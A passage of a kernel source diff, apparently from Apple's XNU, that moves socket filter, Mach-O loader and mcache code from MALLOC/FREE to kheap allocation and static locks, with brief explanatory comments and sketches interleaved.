                /* Free the entry */
-               FREE(filter, M_IFADDR);
+               kheap_free(KM_IFADDR, filter, sizeof(struct socket_filter));
        }
 }
 
@@ -203,7 +192,7 @@ sflt_entry_release(struct socket_filter_entry *entry)
                /* That was the last reference */
 
                /* Take the cleanup lock */
-               lck_mtx_lock(sock_filter_cleanup_lock);
+               lck_mtx_lock(&sock_filter_cleanup_lock);
 
                /* Put this item on the cleanup list */
                entry->sfe_next_oncleanup = sock_filter_cleanup_entries;
@@ -222,7 +211,7 @@ sflt_entry_release(struct socket_filter_entry *entry)
                }
 
                /* Drop the cleanup lock */
-               lck_mtx_unlock(sock_filter_cleanup_lock);
+               lck_mtx_unlock(&sock_filter_cleanup_lock);
        } else if (old <= 0) {
                panic("sflt_entry_release - sfe_refcount (%d) <= 0\n",
                    (int)old);
@@ -236,11 +225,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
 {
 #pragma unused(blah, blah2)
        while (1) {
-               lck_mtx_lock(sock_filter_cleanup_lock);
+               lck_mtx_lock(&sock_filter_cleanup_lock);
                while (sock_filter_cleanup_entries == NULL) {
                        /* Sleep until we've got something better to do */
                        msleep(&sock_filter_cleanup_entries,
-                           sock_filter_cleanup_lock, PWAIT,
+                           &sock_filter_cleanup_lock, PWAIT,
                            "sflt_cleanup", NULL);
                }
 
@@ -249,10 +238,10 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                sock_filter_cleanup_entries = NULL;
 
                /* Drop the lock */
-               lck_mtx_unlock(sock_filter_cleanup_lock);
+               lck_mtx_unlock(&sock_filter_cleanup_lock);
 
                /* Take the socket filter lock */
-               lck_rw_lock_exclusive(sock_filter_lock);
+               lck_rw_lock_exclusive(&sock_filter_lock);
 
                /* Cleanup every dead item */
                struct socket_filter_entry      *entry;
@@ -265,7 +254,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                        if ((entry->sfe_flags & SFEF_NODETACH) == 0 &&
                            entry->sfe_filter->sf_filter.sf_detach) {
                                entry->sfe_flags |= SFEF_NODETACH;
-                               lck_rw_unlock_exclusive(sock_filter_lock);
+                               lck_rw_unlock_exclusive(&sock_filter_lock);
 
                                /*
                                 * Warning - passing a potentially
@@ -274,7 +263,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                                entry->sfe_filter->sf_filter.sf_detach(
                                        entry->sfe_cookie, entry->sfe_socket);
 
-                               lck_rw_lock_exclusive(sock_filter_lock);
+                               lck_rw_lock_exclusive(&sock_filter_lock);
                        }
 
                        /*
@@ -308,11 +297,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                        sflt_release_locked(entry->sfe_filter);
                        entry->sfe_socket = NULL;
                        entry->sfe_filter = NULL;
-                       FREE(entry, M_IFADDR);
+                       kheap_free(KM_IFADDR, entry, sizeof(struct socket_filter_entry));
                }
 
                /* Drop the socket filter lock */
-               lck_rw_unlock_exclusive(sock_filter_lock);
+               lck_rw_unlock_exclusive(&sock_filter_lock);
        }
        /* NOTREACHED */
 }
@@ -339,8 +328,8 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                }
        }
        /* allocate the socket filter entry */
-       MALLOC(entry, struct socket_filter_entry *, sizeof(*entry), M_IFADDR,
-           M_WAITOK);
+       entry = kheap_alloc(KM_IFADDR, sizeof(struct socket_filter_entry),
+           Z_WAITOK);
        if (entry == NULL) {
                return ENOMEM;
        }
@@ -369,7 +358,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                 * Release the filter lock --
                 * callers must be aware we will do this
                 */
-               lck_rw_unlock_exclusive(sock_filter_lock);
+               lck_rw_unlock_exclusive(&sock_filter_lock);
 
                /* Unlock the socket */
                if (socklocked) {
@@ -386,7 +375,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                }
 
                /* Lock the filters again */
-               lck_rw_lock_exclusive(sock_filter_lock);
+               lck_rw_lock_exclusive(&sock_filter_lock);
 
                /*
                 * If the attach function returns an error,
@@ -414,7 +403,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle)
 
        int result = EINVAL;
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        struct socket_filter *filter = NULL;
        TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) {
@@ -427,7 +416,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle)
                result = sflt_attach_locked(socket, filter, 1);
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        return result;
 }
@@ -452,11 +441,11 @@ sflt_initsock(struct socket *so)
         */
        struct protosw *proto = so->so_proto->pr_protosw;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        if (TAILQ_FIRST(&proto->pr_filter_head) != NULL) {
                /* Promote lock to exclusive */
-               if (!lck_rw_lock_shared_to_exclusive(sock_filter_lock)) {
-                       lck_rw_lock_exclusive(sock_filter_lock);
+               if (!lck_rw_lock_shared_to_exclusive(&sock_filter_lock)) {
+                       lck_rw_lock_exclusive(&sock_filter_lock);
                }
 
                /*
@@ -495,7 +484,7 @@ sflt_initsock(struct socket *so)
                        filter = filter_next;
                }
        }
-       lck_rw_done(sock_filter_lock);
+       lck_rw_done(&sock_filter_lock);
 }
 
 /*
@@ -506,7 +495,7 @@ sflt_initsock(struct socket *so)
 __private_extern__ void
 sflt_termsock(struct socket *so)
 {
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        struct socket_filter_entry *entry;
 
@@ -537,16 +526,16 @@ sflt_termsock(struct socket *so)
                        entry->sfe_flags |= SFEF_NODETACH;
 
                        /* Drop the lock before calling the detach function */
-                       lck_rw_unlock_exclusive(sock_filter_lock);
+                       lck_rw_unlock_exclusive(&sock_filter_lock);
                        sfe_filter->sf_filter.sf_detach(sfe_cookie, so);
-                       lck_rw_lock_exclusive(sock_filter_lock);
+                       lck_rw_lock_exclusive(&sock_filter_lock);
 
                        /* Release the filter */
                        sflt_release_locked(sfe_filter);
                }
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 }
 
 
@@ -561,7 +550,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
        struct socket_filter_entry *entry;
        int unlocked = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry; entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
                    entry->sfe_filter->sf_filter.sf_notify &&
@@ -572,7 +561,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -588,11 +577,11 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked != 0) {
                socket_lock(so, 0);
@@ -623,7 +612,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -633,7 +622,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -649,11 +638,11 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -673,7 +662,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -683,7 +672,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -699,11 +688,11 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
                         * Take the socket filter lock again and
                         * release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -723,7 +712,7 @@ sflt_listen(struct socket *so)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -733,7 +722,7 @@ sflt_listen(struct socket *so)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -749,11 +738,11 @@ sflt_listen(struct socket *so)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -774,7 +763,7 @@ sflt_accept(struct socket *head, struct socket *so,
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -784,7 +773,7 @@ sflt_accept(struct socket *head, struct socket *so,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -800,11 +789,11 @@ sflt_accept(struct socket *head, struct socket *so,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -824,7 +813,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -834,7 +823,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -850,11 +839,11 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -874,7 +863,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -884,7 +873,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -900,11 +889,11 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -924,7 +913,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -934,7 +923,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -950,11 +939,11 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -970,7 +959,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -980,7 +969,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -996,11 +985,11 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1054,7 +1043,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -1064,7 +1053,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1080,11 +1069,11 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1104,7 +1093,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -1114,7 +1103,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1130,11 +1119,11 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1156,7 +1145,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
        int setsendthread = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                /* skip if this is a subflow socket */
@@ -1170,7 +1159,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1191,11 +1180,11 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1219,7 +1208,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
        int error = 0;
        int unlocked = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
 
        for (entry = so->so_filt; entry && (error == 0);
            entry = entry->sfe_next_onsocket) {
@@ -1234,7 +1223,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1250,11 +1239,11 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1284,7 +1273,7 @@ sflt_detach(socket_t socket, sflt_handle handle)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
        for (entry = socket->so_filt; entry; entry = entry->sfe_next_onsocket) {
                if (entry->sfe_filter->sf_filter.sf_handle == handle &&
                    (entry->sfe_flags & SFEF_ATTACHED) != 0) {
@@ -1295,7 +1284,7 @@ sflt_detach(socket_t socket, sflt_handle handle)
        if (entry != NULL) {
                sflt_detach_locked(entry);
        }
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        return result;
 }
@@ -1333,14 +1322,12 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
        }
 
        /* Allocate the socket filter */
-       MALLOC(sock_filt, struct socket_filter *, sizeof(*sock_filt),
-           M_IFADDR, M_WAITOK);
+       sock_filt = kheap_alloc(KM_IFADDR,
+           sizeof(struct socket_filter), Z_WAITOK | Z_ZERO);
        if (sock_filt == NULL) {
                return ENOBUFS;
        }
 
-       bzero(sock_filt, sizeof(*sock_filt));
-
        /* Legacy sflt_filter length; current structure minus extended */
        len = sizeof(*filter) - sizeof(struct sflt_filter_ext);
        /*
@@ -1359,7 +1346,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
        }
        bcopy(filter, &sock_filt->sf_filter, len);
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
        /* Look for an existing entry */
        TAILQ_FOREACH(match, &sock_filter_head, sf_global_next) {
                if (match->sf_filter.sf_handle ==
@@ -1384,10 +1371,10 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                        INC_ATOMIC_INT64_LIM(net_api_stats.nas_sfltr_register_os_total);
                }
        }
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        if (match != NULL) {
-               FREE(sock_filt, M_IFADDR);
+               kheap_free(KM_IFADDR, sock_filt, sizeof(struct socket_filter));
                return EEXIST;
        }
 
@@ -1415,8 +1402,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                            !SOCK_CHECK_TYPE(so, type)) {
                                continue;
                        }
-                       MALLOC(solist, struct solist *, sizeof(*solist),
-                           M_IFADDR, M_NOWAIT);
+                       solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT);
                        if (!solist) {
                                continue;
                        }
@@ -1434,8 +1420,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                            !SOCK_CHECK_TYPE(so, type)) {
                                continue;
                        }
-                       MALLOC(solist, struct solist *, sizeof(*solist),
-                           M_IFADDR, M_NOWAIT);
+                       solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT);
                        if (!solist) {
                                continue;
                        }
@@ -1480,7 +1465,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                sock_release(so);
                solist = solisthead;
                solisthead = solisthead->next;
-               FREE(solist, M_IFADDR);
+               kheap_free(KHEAP_TEMP, solist, sizeof(struct solist));
        }
 
        return error;
@@ -1504,7 +1489,7 @@ errno_t
 sflt_unregister(sflt_handle handle)
 {
        struct socket_filter *filter;
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        /* Find the entry by the handle */
        TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) {
@@ -1537,7 +1522,7 @@ sflt_unregister(sflt_handle handle)
                sflt_release_locked(filter);
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        if (filter == NULL) {
                return ENOENT;
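
The KM_IFADDR comment added near the top of the kpi_socketfilter.c section suggests KALLOC_HEAP_DEFINE for callers that want accounting instead of aliasing KHEAP_DEFAULT directly. A minimal sketch of that alternative, assuming the macro takes a variable, a tag string and a heap id as in xnu's kalloc headers; KM_IFADDR_VIEW is a hypothetical name.

#include <kern/kalloc.h>

/*
 * A named view: allocations still come from the default heap, but are
 * attributed to the "socket filter" tag for accounting purposes.
 */
KALLOC_HEAP_DEFINE(KM_IFADDR_VIEW, "socket filter", KHEAP_ID_DEFAULT);

static struct socket_filter *
example_filter_alloc(void)
{
	return kheap_alloc(KM_IFADDR_VIEW,
	           sizeof(struct socket_filter), Z_WAITOK | Z_ZERO);
}
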
index d01293ca79289464a30d00da96bde44d15758b4f..28b5c4fd18c656cd82503735cff4608acd081951 100644 (file)
@@ -1373,6 +1373,15 @@ parse_machfile(
                                }
                                vmc = (struct version_min_command *) lcp;
                                ret = load_version(vmc, &found_version_cmd, imgp->ip_flags, result);
+#if XNU_TARGET_OS_OSX
+                               if (ret == LOAD_SUCCESS) {
+                                       if (result->ip_platform == PLATFORM_IOS) {
+                                               vm_map_mark_alien(map);
+                                       } else {
+                                               assert(!vm_map_is_alien(map));
+                                       }
+                               }
+#endif /* XNU_TARGET_OS_OSX */
                                break;
                        }
                        case LC_BUILD_VERSION: {
@@ -1390,7 +1399,15 @@ parse_machfile(
                                }
                                result->ip_platform = bvc->platform;
                                result->lr_sdk = bvc->sdk;
+                               result->lr_min_sdk = bvc->minos;
                                found_version_cmd = TRUE;
+#if XNU_TARGET_OS_OSX
+                               if (result->ip_platform == PLATFORM_IOS) {
+                                       vm_map_mark_alien(map);
+                               } else {
+                                       assert(!vm_map_is_alien(map));
+                               }
+#endif /* XNU_TARGET_OS_OSX */
                                break;
                        }
                        default:
@@ -2502,6 +2519,7 @@ load_version(
 {
        uint32_t platform = 0;
        uint32_t sdk;
+       uint32_t min_sdk;
 
        if (vmc->cmdsize < sizeof(*vmc)) {
                return LOAD_BADMACHO;
@@ -2511,6 +2529,7 @@ load_version(
        }
        *found_version_cmd = TRUE;
        sdk = vmc->sdk;
+       min_sdk = vmc->version;
        switch (vmc->cmd) {
        case LC_VERSION_MIN_MACOSX:
                platform = PLATFORM_MACOS;
@@ -2547,10 +2566,12 @@ load_version(
        /* All LC_VERSION_MIN_* load commands are legacy and we will not be adding any more */
        default:
                sdk = (uint32_t)-1;
+               min_sdk = (uint32_t)-1;
                __builtin_unreachable();
        }
        result->ip_platform = platform;
-       result->lr_min_sdk = sdk;
+       result->lr_min_sdk = min_sdk;
+       result->lr_sdk = sdk;
        return LOAD_SUCCESS;
 }
 
@@ -3005,7 +3026,7 @@ load_dylinker(
 
        /* Allocate wad-of-data from heap to reduce excessively deep stacks */
 
-       MALLOC(dyld_data, void *, sizeof(*dyld_data), M_TEMP, M_WAITOK);
+       dyld_data = kheap_alloc(KHEAP_TEMP, sizeof(*dyld_data), Z_WAITOK);
        header = &dyld_data->__header;
        myresult = &dyld_data->__myresult;
        macho_data = &dyld_data->__macho_data;
@@ -3061,7 +3082,7 @@ load_dylinker(
        vnode_put(vp);
        kheap_free(KHEAP_TEMP, va, sizeof(*va));
 novp_out:
-       FREE(dyld_data, M_TEMP);
+       kheap_free(KHEAP_TEMP, dyld_data, sizeof(*dyld_data));
        return ret;
 }
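
In parse_machfile()/load_version() above, the loader now records both the minimum OS and the SDK from a version load command: LC_BUILD_VERSION stores bvc->minos into lr_min_sdk, and the legacy LC_VERSION_MIN_* path stores vmc->version into lr_min_sdk and vmc->sdk into lr_sdk (previously lr_min_sdk was filled from the SDK field). Both fields use the packed Mach-O version encoding, X.Y.Z as xxxx.yy.zz; that encoding is standard Mach-O convention rather than something this diff spells out, so the decoder below is only an illustrative sketch:

    /* Hedged sketch: unpack a Mach-O version word such as vmc->version or bvc->sdk. */
    static void
    unpack_macho_version(uint32_t v, uint32_t *major, uint32_t *minor, uint32_t *patch)
    {
            *major = v >> 16;          /* xxxx */
            *minor = (v >> 8) & 0xff;  /* yy */
            *patch = v & 0xff;         /* zz */
    }
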
 
index 76b4c601e5cc2b524666065aad780c189a4ff963..693a144377d05481423bd84fc7f6f02fa1894c2f 100644 (file)
  * caches when memory runs low.
  */
 #define MCACHE_LIST_LOCK() {                            \
-       lck_mtx_lock(mcache_llock);                     \
+       lck_mtx_lock(&mcache_llock);                     \
        mcache_llock_owner = current_thread();          \
 }
 
 #define MCACHE_LIST_UNLOCK() {                          \
        mcache_llock_owner = NULL;                      \
-       lck_mtx_unlock(mcache_llock);                   \
+       lck_mtx_unlock(&mcache_llock);                   \
 }
 
 #define MCACHE_LOCK(l)          lck_mtx_lock(l)
 
 static unsigned int ncpu;
 static unsigned int cache_line_size;
-static lck_mtx_t *mcache_llock;
 static struct thread *mcache_llock_owner;
-static lck_attr_t *mcache_llock_attr;
-static lck_grp_t *mcache_llock_grp;
